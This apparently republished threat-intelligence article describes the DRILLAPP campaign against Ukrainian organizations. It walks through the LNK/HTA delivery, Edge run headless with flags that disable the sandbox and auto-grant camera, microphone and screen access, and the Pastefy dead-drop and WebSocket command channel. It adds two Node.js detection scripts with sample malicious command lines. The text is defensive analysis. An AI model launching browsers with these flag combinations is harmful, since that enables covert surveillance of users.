
DRILLAPP: When the Browser Becomes the Spy

  • Javier Conejo del Cerro
  • 16 Mar
  • 4 min read

A new cyber-espionage campaign targeting Ukrainian organizations reveals how attackers are increasingly abusing legitimate software features to evade detection. The operation deploys a JavaScript-based backdoor called DRILLAPP, executed through Microsoft Edge in headless debugging mode, effectively turning the browser itself into a surveillance tool.

The campaign, observed in February 2026, shows strong overlap with activity previously attributed to Laundry Bear (UAC-0190 / Void Blizzard), a threat actor linked to Russia that has targeted Ukrainian defense entities in earlier operations using the PLUGGYAPE malware family.

Rather than relying on traditional malware loaders or suspicious executables, the attackers leverage browser debugging parameters and legitimate web capabilities to perform espionage tasks. This approach enables stealthy access to sensitive device resources—such as microphones, webcams, and the local file system—while blending into normal browser activity.


Phase 1 — Deception & Delivery 


The intrusion begins with phishing lures targeting Ukrainian entities, including organizations connected to defense and public institutions.

The attackers craft contextualized messages designed to appear legitimate, often referencing topics relevant to the Ukrainian environment. Examples include:

  • Requests related to Starlink installation

  • Communications referencing the Come Back Alive Foundation, a Ukrainian charity supporting the military

  • Judicial or administrative themed communications

These lures deliver Windows shortcut (LNK) files, which act as the first stage of the attack chain.

When opened, the LNK file silently creates an HTML Application (HTA) inside the system’s temporary directory.

This HTA then retrieves an obfuscated JavaScript payload hosted on Pastefy, a legitimate paste service frequently used by developers to share code snippets.

For persistence, the attackers copy the LNK file into the Windows Startup folder, so the chain runs again each time the user logs on.


Phase 2 — Browser-Based Execution 


Once triggered, the HTA launches Microsoft Edge in headless mode, meaning the browser runs without displaying a visible interface to the user.

The attackers pass a series of command-line switches that strip away Edge's security boundaries or silently grant permissions a page would otherwise have to ask the user for:

  • --no-sandbox (runs renderer processes outside the sandbox)

  • --disable-web-security (turns off the same-origin policy)

  • --allow-file-access-from-files (lets a page loaded from file:// read other local files)

  • --use-fake-ui-for-media-stream (auto-accepts the camera and microphone permission prompt)

  • --auto-select-screen-capture-source=true (picks a screen-capture source without showing the picker)

  • --disable-user-media-security (removes the security checks on media-capture requests)

These flags allow the browser process to access sensitive system resources without requiring user interaction, including:

  • Local file system

  • Microphone input

  • Webcam video

  • Screen capture

Because Edge is a trusted and widely used application, its execution does not immediately appear suspicious to many security tools.

The browser then loads the remote obfuscated JavaScript hosted on Pastefy, which deploys the DRILLAPP backdoor.


Phase 3 — Backdoor Activation & Data Collection 


Once active, DRILLAPP functions as a lightweight espionage backdoor executed entirely within the browser environment.

Its capabilities include:

  • Uploading and downloading files

  • Capturing microphone audio

  • Taking images via the webcam

  • Capturing screenshots of the victim’s display

  • Enumerating files within the local system

The malware also generates a unique device fingerprint using canvas fingerprinting, a technique commonly used by web tracking systems to identify browsers.

This fingerprint is transmitted to the attackers together with the victim's country, which the malware infers from the system time zone.

Countries specifically checked by the malware include:

  • Ukraine

  • Russia

  • United Kingdom

  • Germany

  • France

  • China

  • Japan

  • United States

  • Brazil

  • India

  • Canada

  • Australia

  • Italy

  • Spain

  • Poland

If none of these match, the malware defaults to United States.


Phase 4 — Command-and-Control Communication 


The backdoor retrieves its command-and-control (C2) endpoint through Pastefy, which acts as a dead-drop resolver.

From there, the malware receives a WebSocket URL, which is used for real-time communication with the attackers.

Through this channel, DRILLAPP can:

  • Receive commands

  • Upload captured data

  • Transfer files

  • Execute additional operations on the compromised device

Because WebSocket communication is widely used in legitimate applications, the traffic can appear normal within network monitoring tools.
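As an added example that is not part of the original article, the following Node.js script shows one way to turn the dead-drop pattern of this phase into a detection: per client, it remembers the most recent request to a paste service and raises a high-severity alert when a WebSocket session to a non-allowlisted host follows within a short window, while WebSocket sessions to raw IPs or to hosts outside the allowlist are triaged at lower severity. The one-line-per-request log format, the paste-service list and the allowlist are assumptions, and the sample log is constructed.

```javascript
// Added example, not code from the article: correlate outbound HTTP/WebSocket
// records per client so that a WebSocket session opened shortly after a fetch
// from a paste service (the dead-drop pattern of Phase 4) is raised as an
// alert, and WebSocket sessions to hosts outside an allowlist are triaged.
// The log format (one line per request: time client method host path upgrade)
// is an assumed simplified proxy format, the paste-service and allowlist
// domains are assumptions to be tuned, and the sample lines are constructed.

const PASTE_SERVICES = new Set(['pastefy.app', 'pastebin.com', 'paste.example']);

function parseLine(line) {
  const [ts, client, method, host, path, upgrade = '-'] = line.trim().split(/\s+/);
  return {
    ts: Date.parse(ts), client, method, host: host.toLowerCase(), path,
    websocket: upgrade.toLowerCase() === 'websocket',
  };
}

const IPV4 = /^\d{1,3}(\.\d{1,3}){3}$/;

// Returns alerts in time order. windowSec bounds the paste -> WebSocket gap.
function correlate(logText, { windowSec = 300, allowedWsHosts = new Set() } = {}) {
  const events = logText.split('\n').filter((l) => l.trim()).map(parseLine)
    .sort((a, b) => a.ts - b.ts);
  const lastPasteFetch = new Map(); // client -> most recent paste-service request
  const alerts = [];
  for (const ev of events) {
    if (PASTE_SERVICES.has(ev.host)) lastPasteFetch.set(ev.client, ev);
    if (!ev.websocket || allowedWsHosts.has(ev.host)) continue;
    const paste = lastPasteFetch.get(ev.client);
    const gap = paste ? (ev.ts - paste.ts) / 1000 : Infinity;
    let severity, reason;
    if (gap <= windowSec) {
      // Dead-drop resolution followed by a WebSocket session: the Phase 4 shape.
      severity = 'high';
      reason = `WebSocket to ${ev.host} ${gap}s after fetching ${paste.host}${paste.path}`;
    } else if (IPV4.test(ev.host)) {
      severity = 'medium';
      reason = `WebSocket to raw IP ${ev.host}`;
    } else {
      severity = 'low';
      reason = `WebSocket to ${ev.host}, not on the allowlist`;
    }
    alerts.push({ ts: ev.ts, client: ev.client, host: ev.host, severity, reason });
  }
  return alerts;
}

// Constructed sample log (not real traffic). Clients are RFC 1918 addresses,
// hosts use example/TEST-NET values.
const SAMPLE_LOG = `
2026-02-10T09:14:02Z 10.0.0.21 GET paste.example /raw/abc123 -
2026-02-10T09:14:05Z 10.0.0.21 GET c2-ws.example /session websocket
2026-02-10T09:15:10Z 10.0.0.33 GET teams.example /ws websocket
2026-02-10T09:16:44Z 10.0.0.40 GET 203.0.113.7 /ws websocket
2026-02-10T11:30:00Z 10.0.0.21 GET chat.example /socket websocket
2026-02-10T11:31:12Z 10.0.0.33 GET paste.example /raw/def456 -
`;

const ALERTS = correlate(SAMPLE_LOG, { allowedWsHosts: new Set(['teams.example']) });
for (const a of ALERTS) console.log(`[${a.severity}] ${a.client}: ${a.reason}`);
```

A real deployment would feed this proxy or Zeek `http` records (the `Upgrade: websocket` header is what marks the session) and keep the allowlist populated from known collaboration and SaaS endpoints; the window is the tunable that trades coverage against noise.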


Phase 5 — Malware Evolution & Improved Capabilities 


Researchers identified two versions of the campaign.


Early February Variant


The initial attack chain relied on:

  • LNK files

  • HTA execution

  • JavaScript payload from Pastefy

  • Edge debugging parameters


Late February Variant


A more advanced version replaced the LNK files with Windows Control Panel modules (.cpl files) as the delivery vehicle, while keeping the rest of the infection chain the same.

The updated DRILLAPP backdoor introduced additional capabilities:

  • Recursive file enumeration

  • Batch file uploads

  • Arbitrary file downloads

To download files to the victim's disk on demand, which page JavaScript cannot do without going through the browser's own download handling, the attackers abused the Chrome DevTools Protocol (CDP).

This protocol is normally used by developers for browser debugging, but becomes accessible when Edge runs with the parameter:

--remote-debugging-port

Over CDP the attackers can instruct the browser itself to fetch and save files, an action that sits outside the page's web security model, so the restrictions that apply to script running in a page do not apply.


Why This Technique Is Dangerous


The campaign demonstrates a shift toward browser-native malware techniques.

Browsers provide attackers with several advantages:

  • They are trusted and commonly executed processes

  • They already possess access to sensitive resources such as microphones and cameras

  • Debugging features can expose powerful internal capabilities

  • Network traffic generated by browsers is less likely to raise suspicion

By abusing debugging parameters, the attackers effectively transform a legitimate browser into a covert surveillance tool.


Measures to Fend Off the Attack 


Organizations can mitigate this threat by implementing several defensive controls:

  • Detect browsers launched with suspicious debugging parameters

  • Monitor execution chains involving LNK → HTA files

  • Restrict or alert on headless execution of Microsoft Edge

  • Inspect network traffic to paste services such as Pastefy

  • Detect WebSocket connections to unknown infrastructure

  • Monitor abnormal access to camera, microphone, and screen capture APIs

  • Deploy behavior-based EDR solutions capable of detecting browser abuse

  • Restrict execution of HTA files where possible

  • Audit persistence mechanisms such as Windows Startup folder modifications
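The first three controls above, together with the switch list in Phase 2 and the `--remote-debugging-port` switch from Phase 5, reduce to one process-creation rule. The following Node.js script is an added example, not code from the article or from any vendor: it scores a Sysmon-style process-creation event, treating a Chromium browser started headless with any of the six weakening switches, started with DevTools exposed, or started by a script host as suspicious, and separately flags mshta.exe running an HTA from a temp folder or a URL (the LNK → HTA step). Field names follow Sysmon Event ID 1; the scoring thresholds and the sample events are assumptions.

```javascript
// Added example, not code from the article or from the DRILLAPP operators:
// triage Windows process-creation events for the Phase 2 / Phase 5 pattern
// (a Chromium browser started headless with sandbox- or permission-weakening
// switches, or with remote debugging exposed, by a script host) and for the
// LNK -> HTA step (mshta.exe running an HTA from a temp folder or a URL).
// Field names follow Sysmon Event ID 1; the sample events are constructed.

// The six switches the article lists. Each removes a boundary or auto-grants
// a permission that a page would otherwise need the user to approve.
const WEAKENING_SWITCHES = new Set([
  '--no-sandbox',
  '--disable-web-security',
  '--allow-file-access-from-files',
  '--use-fake-ui-for-media-stream',
  '--auto-select-screen-capture-source',
  '--disable-user-media-security',
]);
// Switches that expose the Chrome DevTools Protocol to another process.
const DEVTOOLS_SWITCHES = new Set(['--remote-debugging-port', '--remote-debugging-pipe']);
const BROWSERS = new Set(['msedge.exe', 'chrome.exe', 'chromium.exe']);
// Parents that have no business starting a browser on a workstation.
const SCRIPT_HOSTS = new Set(['mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe',
  'powershell.exe', 'rundll32.exe', 'control.exe']);

// Split a Windows command line into arguments, honouring double quotes.
function tokenize(cmdline) {
  const tokens = [];
  const re = /"([^"]*)"|(\S+)/g;
  let m;
  while ((m = re.exec(cmdline)) !== null) tokens.push(m[1] !== undefined ? m[1] : m[2]);
  return tokens;
}

// '--remote-debugging-port=9222' -> '--remote-debugging-port'; null if not a switch.
function switchName(token) {
  if (!token.startsWith('--')) return null;
  const eq = token.indexOf('=');
  return (eq === -1 ? token : token.slice(0, eq)).toLowerCase();
}

function basename(path) {
  return String(path || '').split(/[\\/]/).pop().toLowerCase();
}

// Score one event. Returns { severity: 'none'|'medium'|'high', findings: [...] }.
function analyzeProcessEvent(ev) {
  const image = basename(ev.Image);
  const parent = basename(ev.ParentImage);
  const tokens = tokenize(ev.CommandLine || '');
  const switches = new Set(tokens.map(switchName).filter(Boolean));
  const findings = [];
  let score = 0;

  if (BROWSERS.has(image)) {
    const weakening = [...switches].filter((s) => WEAKENING_SWITCHES.has(s)).sort();
    const headless = switches.has('--headless');
    if (weakening.length > 0) {
      // Headless + weakening switches is the DRILLAPP launch; headless alone
      // is common in test automation and is deliberately not scored.
      score += headless ? 3 : 1;
      findings.push(`${headless ? 'headless ' : ''}browser with ${weakening.join(' ')}`);
    }
    if ([...switches].some((s) => DEVTOOLS_SWITCHES.has(s))) {
      score += 1;
      findings.push('DevTools protocol exposed');
    }
    if (SCRIPT_HOSTS.has(parent)) {
      score += 2;
      findings.push(`browser launched by ${parent}`);
    }
  } else if (image === 'mshta.exe') {
    // First non-switch argument is the HTA (path or URL) being executed.
    const target = tokens.slice(1).find((t) => !t.startsWith('-'));
    if (target && (/[\\/]te?mp[\\/]/i.test(target) || /^https?:/i.test(target))) {
      score += 2;
      findings.push(`mshta running ${target}`);
    }
  }

  const severity = score >= 3 ? 'high' : score > 0 ? 'medium' : 'none';
  return { severity, findings };
}

function triage(events) {
  return events.map(analyzeProcessEvent).filter((r) => r.severity !== 'none');
}

// Constructed sample events (not real telemetry).
const EDGE = 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe';
const SAMPLE_EVENTS = [
  { Image: EDGE, ParentImage: 'C:\\Windows\\System32\\mshta.exe',
    CommandLine: `"${EDGE}" --headless --no-sandbox --disable-web-security ` +
      '--allow-file-access-from-files --use-fake-ui-for-media-stream ' +
      '--auto-select-screen-capture-source=true --disable-user-media-security ' +
      '--remote-debugging-port=9222 https://paste.example/raw/abc123' },
  { Image: EDGE, ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: `"${EDGE}" --profile-directory=Default https://intranet.example/` },
  { Image: EDGE, ParentImage: 'C:\\Program Files\\nodejs\\node.exe',
    CommandLine: `"${EDGE}" --headless=new --disable-gpu --screenshot https://intranet.example/` },
  { Image: 'C:\\Windows\\System32\\mshta.exe', ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: 'mshta.exe "C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.hta"' },
  { Image: EDGE, ParentImage: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: `"${EDGE}" --remote-debugging-port=9222 about:blank` },
];

for (const ev of SAMPLE_EVENTS) {
  const r = analyzeProcessEvent(ev);
  if (r.severity !== 'none') console.log(`[${r.severity}] ${basename(ev.Image)}: ${r.findings.join('; ')}`);
}
```

Headless mode on its own is deliberately not scored: test runners and PDF generators launch `msedge.exe --headless` routinely, and it is the combination with the weakening switches, or with an mshta.exe or powershell.exe parent, that carries the signal. The same logic ports directly to a Sysmon-backed SIEM rule once the field names are mapped.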


The DRILLAPP campaign highlights an emerging evolution in cyber-espionage tradecraft. Instead of deploying traditional malware binaries, attackers increasingly exploit legitimate software features to conduct surveillance while evading detection.

By abusing browser debugging capabilities, the operators behind this campaign effectively turn Microsoft Edge into a covert espionage platform capable of collecting audio, video, files, and screen data directly from infected systems.


As browsers continue to expand their capabilities—and as debugging tools expose deeper system access—their misuse is likely to become an increasingly attractive vector for stealthy cyber operations.

Defenders must therefore begin treating browsers not only as user applications, but also as potential execution environments for advanced malware.



Source: The Hacker News

